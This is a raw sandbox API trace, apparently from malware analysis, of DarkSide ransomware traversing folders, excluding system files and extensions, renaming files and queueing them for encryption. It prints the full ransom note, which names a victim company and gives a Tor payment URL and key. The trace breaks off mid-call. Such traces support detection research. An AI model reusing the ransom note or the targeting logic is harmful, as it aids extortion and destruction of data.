[0167.103] wcslen (_String="perflogs") returned 0x8 [0167.103] _wcsicmp (_Str1="x64dbg", _Str2="_MTmDgixdwsa7RVqo") returned 25 [0167.103] wcslen (_String="x64dbg") returned 0x6 [0167.103] _wcsicmp (_Str1="public", _Str2="_MTmDgixdwsa7RVqo") returned 17 [0167.103] wcslen (_String="public") returned 0x6 [0167.103] _wcsicmp (_Str1="all users", _Str2="_MTmDgixdwsa7RVqo") returned 2 [0167.103] wcslen (_String="all users") returned 0x9 [0167.103] _wcsicmp (_Str1="default", _Str2="_MTmDgixdwsa7RVqo") returned 5 [0167.103] wcslen (_String="default") returned 0x7 [0167.103] wcscpy (in: _Dest=0x3230058, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\*" [0167.103] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\*") returned 0x38 [0167.103] wcscpy (in: _Dest=0x32300c6, _Source="_MTmDgixdwsa7RVqo" | out: _Dest="_MTmDgixdwsa7RVqo") returned="_MTmDgixdwsa7RVqo" [0167.104] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0167.104] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3262070 [0167.105] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" [0167.106] GetNamedSecurityInfoW () returned 0x0 [0167.106] SetEntriesInAclW () returned 0x0 [0167.106] SetNamedSecurityInfoW () returned 0x0 [0167.124] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22bf28) returned 1 [0167.124] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e66c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.124] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo")) returned 1 [0167.124] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0167.124] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0167.125] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e63c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e63c*=0x7ca, lpOverlapped=0x0) returned 1 [0167.126] CloseHandle (hObject=0x1bc) returned 1 [0167.126] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0167.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo")) returned 0x10 [0167.126] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\") returned="" [0167.126] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\") returned 0x49 [0167.126] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\*", fInfoLevelId=0x0, lpFindFileData=0x32e89c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e89c) returned 0x1541c8 [0167.126] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d7c0d10, ftCreationTime.dwHighDateTime=0x1d5e435, ftLastAccessTime.dwLowDateTime=0x91500d40, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x91500d40, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.127] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ae03b70, ftCreationTime.dwHighDateTime=0x1d5dc3e, ftLastAccessTime.dwLowDateTime=0x37cc93d0, ftLastAccessTime.dwHighDateTime=0x1d5d99b, ftLastWriteTime.dwLowDateTime=0x37cc93d0, ftLastWriteTime.dwHighDateTime=0x1d5d99b, nFileSizeHigh=0x0, nFileSizeLow=0x10fe9, dwReserved0=0x0, dwReserved1=0x0, cFileName="6qoV99z5F43.gif", cAlternateFileName="6QOV99~1.GIF")) returned 1 [0167.127] _wcsicmp (_Str1="6qoV99z5F43.gif", _Str2="README.c06622a1.TXT") returned -60 [0167.127] wcsstr (_Str="6qoV99z5F43.gif", _SubStr="README") returned 0x0 [0167.127] _wcsicmp (_Str1="autorun.inf", _Str2="6qoV99z5F43.gif") returned 43 [0167.127] wcslen (_String="autorun.inf") returned 0xb [0167.127] _wcsicmp (_Str1="boot.ini", _Str2="6qoV99z5F43.gif") returned 44 [0167.127] wcslen (_String="boot.ini") returned 0x8 [0167.127] _wcsicmp (_Str1="bootfont.bin", _Str2="6qoV99z5F43.gif") returned 44 [0167.127] wcslen (_String="bootfont.bin") returned 0xc [0167.127] _wcsicmp (_Str1="bootsect.bak", _Str2="6qoV99z5F43.gif") returned 44 [0167.127] wcslen (_String="bootsect.bak") returned 0xc [0167.127] _wcsicmp (_Str1="desktop.ini", _Str2="6qoV99z5F43.gif") returned 46 [0167.127] wcslen (_String="desktop.ini") returned 0xb [0167.127] _wcsicmp (_Str1="iconcache.db", _Str2="6qoV99z5F43.gif") returned 51 [0167.127] wcslen (_String="iconcache.db") returned 0xc [0167.127] _wcsicmp (_Str1="ntldr", _Str2="6qoV99z5F43.gif") returned 56 [0167.128] wcslen (_String="ntldr") returned 0x5 [0167.128] _wcsicmp (_Str1="ntuser.dat", _Str2="6qoV99z5F43.gif") returned 56 [0167.128] wcslen (_String="ntuser.dat") returned 0xa [0167.128] _wcsicmp (_Str1="ntuser.dat.log", _Str2="6qoV99z5F43.gif") returned 56 [0167.128] wcslen (_String="ntuser.dat.log") returned 0xe [0167.128] _wcsicmp (_Str1="ntuser.ini", _Str2="6qoV99z5F43.gif") returned 56 [0167.128] wcslen (_String="ntuser.ini") returned 0xa [0167.128] _wcsicmp (_Str1="thumbs.db", _Str2="6qoV99z5F43.gif") returned 62 [0167.128] wcslen (_String="thumbs.db") returned 0x9 [0167.128] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0167.128] wcslen (_String="386") returned 0x3 [0167.128] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0167.128] wcslen (_String="adv") returned 0x3 [0167.128] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0167.128] wcslen (_String="ani") returned 0x3 [0167.128] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0167.128] wcslen (_String="bat") returned 0x3 [0167.128] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0167.128] wcslen (_String="bin") returned 0x3 [0167.128] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0167.128] wcslen (_String="cab") returned 0x3 [0167.128] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0167.128] wcslen (_String="cmd") returned 0x3 [0167.128] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0167.128] wcslen (_String="com") returned 0x3 [0167.128] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0167.128] wcslen (_String="cpl") returned 0x3 [0167.128] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0167.128] wcslen (_String="cur") returned 0x3 [0167.129] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0167.129] wcslen (_String="deskthemepack") returned 0xd [0167.129] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0167.129] wcslen (_String="diagcab") returned 0x7 [0167.129] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0167.129] wcslen (_String="diagcfg") returned 0x7 [0167.129] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0167.129] wcslen (_String="diagpkg") returned 0x7 [0167.129] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0167.129] wcslen (_String="dll") returned 0x3 [0167.129] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0167.129] wcslen (_String="drv") returned 0x3 [0167.129] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0167.129] wcslen (_String="exe") returned 0x3 [0167.129] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0167.129] wcslen (_String="hlp") returned 0x3 [0167.129] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0167.129] wcslen (_String="icl") returned 0x3 [0167.129] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0167.129] wcslen (_String="icns") returned 0x4 [0167.129] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0167.129] wcslen (_String="ico") returned 0x3 [0167.129] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0167.129] wcslen (_String="ics") returned 0x3 [0167.129] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0167.129] wcslen (_String="idx") returned 0x3 [0167.129] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0167.129] wcslen (_String="ldf") returned 0x3 [0167.129] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0167.129] wcslen (_String="lnk") returned 0x3 [0167.129] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0167.130] wcslen (_String="mod") returned 0x3 [0167.130] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0167.130] wcslen (_String="mpa") returned 0x3 [0167.130] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0167.130] wcslen (_String="msc") returned 0x3 [0167.130] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0167.130] wcslen (_String="msp") returned 0x3 [0167.130] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0167.130] wcslen (_String="msstyles") returned 0x8 [0167.130] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0167.130] wcslen (_String="msu") returned 0x3 [0167.130] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0167.130] wcslen (_String="nls") returned 0x3 [0167.130] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0167.130] wcslen (_String="nomedia") returned 0x7 [0167.130] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0167.130] wcslen (_String="ocx") returned 0x3 [0167.130] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0167.130] wcslen (_String="prf") returned 0x3 [0167.130] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0167.130] wcslen (_String="ps1") returned 0x3 [0167.130] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0167.130] wcslen (_String="rom") returned 0x3 [0167.130] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0167.130] wcslen (_String="rtp") returned 0x3 [0167.130] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0167.130] wcslen (_String="scr") returned 0x3 [0167.131] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0167.131] wcslen (_String="shs") returned 0x3 [0167.131] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0167.131] wcslen (_String="spl") returned 0x3 [0167.131] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0167.131] wcslen (_String="sys") returned 0x3 [0167.131] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0167.131] wcslen (_String="theme") returned 0x5 [0167.131] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0167.131] wcslen (_String="themepack") returned 0x9 [0167.131] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0167.131] wcslen (_String="wpx") returned 0x3 [0167.131] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0167.131] wcslen (_String="lock") returned 0x4 [0167.145] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0167.145] wcslen (_String="key") returned 0x3 [0167.146] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0167.146] wcslen (_String="hta") returned 0x3 [0167.146] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0167.146] wcslen (_String="msi") returned 0x3 [0167.146] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0167.146] wcslen (_String="pdb") returned 0x3 [0167.146] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0167.146] wcslen (_String="sqlite") returned 0x6 [0167.146] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo")) returned 0x10 [0167.146] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0167.146] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo" [0167.146] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo") returned 0x48 [0167.146] wcscpy (in: _Dest=0x3282112, _Source="6qoV99z5F43.gif" | out: _Dest="6qoV99z5F43.gif") returned="6qoV99z5F43.gif" [0167.146] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\6qoV99z5F43.gif", dwFileAttributes=0x80) returned 1 [0167.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\6qoV99z5F43.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\6qov99z5f43.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0167.147] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.147] ReadFile (in: hFile=0x1ec, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0167.147] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0x3fd4a982 [0167.148] RtlComputeCrc32 (PartialCrc=0xa982, Buffer=0x32e724, Length=0x80) returned 0x68940f02 [0167.148] RtlComputeCrc32 (PartialCrc=0xf02, Buffer=0x32e724, Length=0x80) returned 0x798dc3e6 [0167.148] RtlComputeCrc32 (PartialCrc=0xc3e6, Buffer=0x32e724, Length=0x80) returned 0x6f45c878 [0167.148] RtlComputeCrc32 (PartialCrc=0xc878, Buffer=0x32e724, Length=0x80) returned 0xb75e633 [0167.148] CloseHandle (hObject=0x1ec) returned 1 [0167.148] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3292088 [0167.148] wcscpy (in: _Dest=0x3292088, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\6qoV99z5F43.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\6qoV99z5F43.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\6qoV99z5F43.gif" [0167.148] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\6qoV99z5F43.gif") returned 0x58 [0167.148] wcscpy (in: _Dest=0x3292138, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.148] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\6qoV99z5F43.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\6qov99z5f43.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\6qoV99z5F43.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\6qov99z5f43.gif.c06622a1"), dwFlags=0x8) returned 1 [0167.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\6qoV99z5F43.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\6qov99z5f43.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ec [0167.152] CreateIoCompletionPort (FileHandle=0x1ec, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0167.152] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0167.158] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2a46124 [0167.158] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6e04640b [0167.158] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5db2cb85 [0167.158] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3ebe1f06 [0167.158] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x66f9bf2f [0167.158] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7f4c129d [0167.158] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xb906b10 [0167.158] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x541690b8 [0167.162] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x3712a596 [0167.162] RtlComputeCrc32 (PartialCrc=0xa596, Buffer=0x710094, Length=0x80) returned 0xf50320c3 [0167.162] RtlComputeCrc32 (PartialCrc=0x20c3, Buffer=0x710094, Length=0x80) returned 0x969bf003 [0167.162] RtlComputeCrc32 (PartialCrc=0xf003, Buffer=0x710094, Length=0x80) returned 0x7f4d60a5 [0167.162] RtlComputeCrc32 (PartialCrc=0x60a5, Buffer=0x710094, Length=0x80) returned 0x6b4e9b7a [0167.162] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0167.162] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0167.162] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3292088) returned 1 [0167.162] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c443fb0, ftCreationTime.dwHighDateTime=0x1d5e4c6, ftLastAccessTime.dwLowDateTime=0x21c996c0, ftLastAccessTime.dwHighDateTime=0x1d5e1b4, ftLastWriteTime.dwLowDateTime=0x21c996c0, ftLastWriteTime.dwHighDateTime=0x1d5e1b4, nFileSizeHigh=0x0, nFileSizeLow=0x520d, dwReserved0=0x0, dwReserved1=0x0, cFileName="7ZCJwAfR5VGvVkS.png", cAlternateFileName="7ZCJWA~1.PNG")) returned 1 [0167.162] _wcsicmp (_Str1="7ZCJwAfR5VGvVkS.png", _Str2="README.c06622a1.TXT") returned -59 [0167.162] wcsstr (_Str="7ZCJwAfR5VGvVkS.png", _SubStr="README") returned 0x0 [0167.162] _wcsicmp (_Str1="autorun.inf", _Str2="7ZCJwAfR5VGvVkS.png") returned 42 [0167.162] wcslen (_String="autorun.inf") returned 0xb [0167.162] _wcsicmp (_Str1="boot.ini", _Str2="7ZCJwAfR5VGvVkS.png") returned 43 [0167.162] wcslen (_String="boot.ini") returned 0x8 [0167.162] _wcsicmp (_Str1="bootfont.bin", _Str2="7ZCJwAfR5VGvVkS.png") returned 43 [0167.162] wcslen (_String="bootfont.bin") returned 0xc [0167.162] _wcsicmp (_Str1="bootsect.bak", _Str2="7ZCJwAfR5VGvVkS.png") returned 43 [0167.162] wcslen (_String="bootsect.bak") returned 0xc [0167.162] _wcsicmp (_Str1="desktop.ini", _Str2="7ZCJwAfR5VGvVkS.png") returned 45 [0167.162] wcslen (_String="desktop.ini") returned 0xb [0167.162] _wcsicmp (_Str1="iconcache.db", _Str2="7ZCJwAfR5VGvVkS.png") returned 50 [0167.162] wcslen (_String="iconcache.db") returned 0xc [0167.162] _wcsicmp (_Str1="ntldr", _Str2="7ZCJwAfR5VGvVkS.png") returned 55 [0167.162] wcslen (_String="ntldr") returned 0x5 [0167.162] _wcsicmp (_Str1="ntuser.dat", _Str2="7ZCJwAfR5VGvVkS.png") returned 55 [0167.162] wcslen (_String="ntuser.dat") returned 0xa [0167.162] _wcsicmp (_Str1="ntuser.dat.log", _Str2="7ZCJwAfR5VGvVkS.png") returned 55 [0167.163] wcslen (_String="ntuser.dat.log") returned 0xe [0167.163] _wcsicmp (_Str1="ntuser.ini", _Str2="7ZCJwAfR5VGvVkS.png") returned 55 [0167.163] wcslen (_String="ntuser.ini") returned 0xa [0167.163] _wcsicmp (_Str1="thumbs.db", _Str2="7ZCJwAfR5VGvVkS.png") returned 61 [0167.163] wcslen (_String="thumbs.db") returned 0x9 [0167.163] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0167.163] wcslen (_String="386") returned 0x3 [0167.163] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0167.163] wcslen (_String="adv") returned 0x3 [0167.163] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0167.163] wcslen (_String="ani") returned 0x3 [0167.163] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0167.163] wcslen (_String="bat") returned 0x3 [0167.163] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0167.163] wcslen (_String="bin") returned 0x3 [0167.163] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0167.163] wcslen (_String="cab") returned 0x3 [0167.163] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0167.163] wcslen (_String="cmd") returned 0x3 [0167.163] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0167.163] wcslen (_String="com") returned 0x3 [0167.163] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0167.163] wcslen (_String="cpl") returned 0x3 [0167.163] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0167.163] wcslen (_String="cur") returned 0x3 [0167.163] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0167.163] wcslen (_String="deskthemepack") returned 0xd [0167.163] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0167.163] wcslen (_String="diagcab") returned 0x7 [0167.163] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0167.163] wcslen (_String="diagcfg") returned 0x7 [0167.163] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0167.163] wcslen (_String="diagpkg") returned 0x7 [0167.163] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0167.164] wcslen (_String="dll") returned 0x3 [0167.164] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0167.164] wcslen (_String="drv") returned 0x3 [0167.164] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0167.164] wcslen (_String="exe") returned 0x3 [0167.164] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0167.164] wcslen (_String="hlp") returned 0x3 [0167.164] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0167.164] wcslen (_String="icl") returned 0x3 [0167.164] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0167.164] wcslen (_String="icns") returned 0x4 [0167.164] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0167.164] wcslen (_String="ico") returned 0x3 [0167.164] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0167.164] wcslen (_String="ics") returned 0x3 [0167.164] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0167.164] wcslen (_String="idx") returned 0x3 [0167.164] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0167.164] wcslen (_String="ldf") returned 0x3 [0167.164] _wcsicmp 